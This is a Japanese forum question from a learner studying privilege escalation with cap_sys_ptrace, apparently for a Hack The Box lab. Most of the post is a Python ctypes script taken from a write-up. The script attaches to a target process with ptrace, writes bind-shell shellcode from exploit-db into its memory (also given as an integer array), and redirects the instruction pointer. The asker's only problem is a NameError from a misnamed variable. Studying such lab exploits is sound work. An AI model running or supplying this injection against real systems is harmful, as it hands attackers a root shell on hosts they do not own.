Q&A
前提
cap_sys_ptraceを使ったprivilege escalationを初めて勉強しています。
実現したいこと
/usr/bin/python3.8 = cap_sys_ptrace+epの時のprivilege escalationの達成
発生している問題・エラーメッセージ
NameError: name 'val' is not defined
該当のソースコード
python
1import ctypes 2import sys 3import struct 4 5PTRACE_POKETEXT = 4 6PTRACE_GETREGS = 12 7PTRACE_SETREGS = 13 8PTRACE_ATTACH = 16 9PTRACE_DETACH = 17 10 11class user_regs_struct(ctypes.Structure): 12 _fields_ = [ 13 ("r15", ctypes.c_ulonglong), 14 ("r14", ctypes.c_ulonglong), 15 ("r13", ctypes.c_ulonglong), 16 ("r12", ctypes.c_ulonglong), 17 ("rbp", ctypes.c_ulonglong), 18 ("rbx", ctypes.c_ulonglong), 19 ("r11", ctypes.c_ulonglong), 20 ("r10", ctypes.c_ulonglong), 21 ("r9", ctypes.c_ulonglong), 22 ("r8", ctypes.c_ulonglong), 23 ("rax", ctypes.c_ulonglong), 24 ("rcx", ctypes.c_ulonglong), 25 ("rdx", ctypes.c_ulonglong), 26 ("rsi", ctypes.c_ulonglong), 27 ("rdi", ctypes.c_ulonglong), 28 ("orig_rax", ctypes.c_ulonglong), 29 ("rip", ctypes.c_ulonglong), 30 ("cs", ctypes.c_ulonglong), 31 ("eflags", ctypes.c_ulonglong), 32 ("rsp", ctypes.c_ulonglong), 33 ("ss", ctypes.c_ulonglong), 34 ("fs_base", ctypes.c_ulonglong), 35 ("gs_base", ctypes.c_ulonglong), 36 ("ds", ctypes.c_ulonglong), 37 ("es", ctypes.c_ulonglong), 38 ("fs", ctypes.c_ulonglong), 39 ("gs", ctypes.c_ulonglong), 40 ] 41 42libc = ctypes.CDLL("libc.so.6") 43pid=int(sys.argv[1]) 44# Define argument type and respone type. 45libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p] 46libc.ptrace.restype = ctypes.c_uint64 47# Attach to the process 48libc.ptrace(PTRACE_ATTACH, pid, None, None) 49registers=user_regs_struct() 50# Retrieve the value stored in registers 51libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers)) 52print("Instruction Pointer: " + hex(registers.rip)) 53print("Injecting Shellcode at: " + hex(registers.rip)) 54# Shell code copied from exploit db. 55shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05" 56 57 58# CHANGED FROM HERE 59# Previously obtained value 60final = [1220555080, 826855985, 1791426550, 40523817, 1208291167, 1711434391, 35931335, 1582620693, 1479633490, 257560682, 845831685, 1778716504, 84891691, 57317192, 2966355806, 1963265825, 1390868472, 1647295304, 791637609, 1213425779, 2955164813, 331579] 61 62# Inject the shellcode into the running process byte by byte. 63j = 0 64for i in range(0,len(shellcode),4): 65 # Inject the byte. 66 libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),val[j]) 67 j +=1 68 69# CHANGED UPTO HERE 70 71print("Shellcode Injected!!") 72# Modify the instuction pointer 73registers.rip=registers.rip+2 74# Set the registers 75libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers)) 76print("Final Instruction Pointer: " + hex(registers.rip)) 77# Detach from the process. 78libc.ptrace(PTRACE_DETACH, pid, None, None)
試したこと
そもそも何故modifyしてるかもわかりません。
補足情報(FW/ツールのバージョンなど)
https://shishirsubedi.com.np/htb/doctor/
ここのコードを使いました。
あなたの回答
tips
プレビュー
